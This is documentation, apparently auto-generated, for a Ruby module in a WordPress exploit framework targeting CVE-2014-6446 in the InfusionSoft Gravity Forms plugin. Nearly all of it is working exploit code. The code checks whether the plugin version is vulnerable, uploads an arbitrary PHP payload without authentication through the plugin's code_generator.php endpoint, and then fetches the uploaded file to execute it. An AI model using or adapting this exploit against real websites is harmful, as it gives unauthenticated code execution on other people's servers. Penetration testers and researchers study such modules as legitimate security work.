class Wpxf::Exploit::InfusionsoftShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'InfusionSoft Shell Upload',
    desc: 'This module exploits a file upload vulnerability in versions '\
          '1.5.3 to 1.5.10 of the InfusionSoft Gravity Forms plugin which '\
          'allows unauthenticated users to upload and execute PHP scripts '\
          'in the context of the web server.',
    author: [
      'g0blin',    # Vulnerability discovery
      'rastating'  # WPXF module
    ],
    references: [
      ['CVE', '2014-6446'],
      ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
      ['WPVDB', '7634']
    ],
    date: 'Sep 25 2014'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 28
def check
  check_plugin_version_from_readme('infusionsoft', '1.5.11', '1.5.3')
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 32
def plugin_url
  normalize_uri(wordpress_url_plugins, 'infusionsoft')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 40
def run
  return false unless super

  emit_info 'Preparing payload...'
  payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
  body = {
    'fileNamePattern' => payload_name,
    'fileTemplate' => payload.encoded
  }

  emit_info 'Uploading payload...'
  res = execute_post_request(url: uploader_url, body: body)

  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200 || res.body !~ /Creating File/i
    emit_info "Response code: #{res.code}", true
    emit_info "Response body: #{res.body}", true
    emit_error 'Failed to upload payload'
    return false
  end

  payload_url = normalize_uri(plugin_url, 'Infusionsoft', 'utilities', payload_name)
  emit_success "Uploaded the payload to #{payload_url}", true

  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  return true
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 36
def uploader_url
  normalize_uri(plugin_url, 'Infusionsoft', 'utilities', 'code_generator.php')
end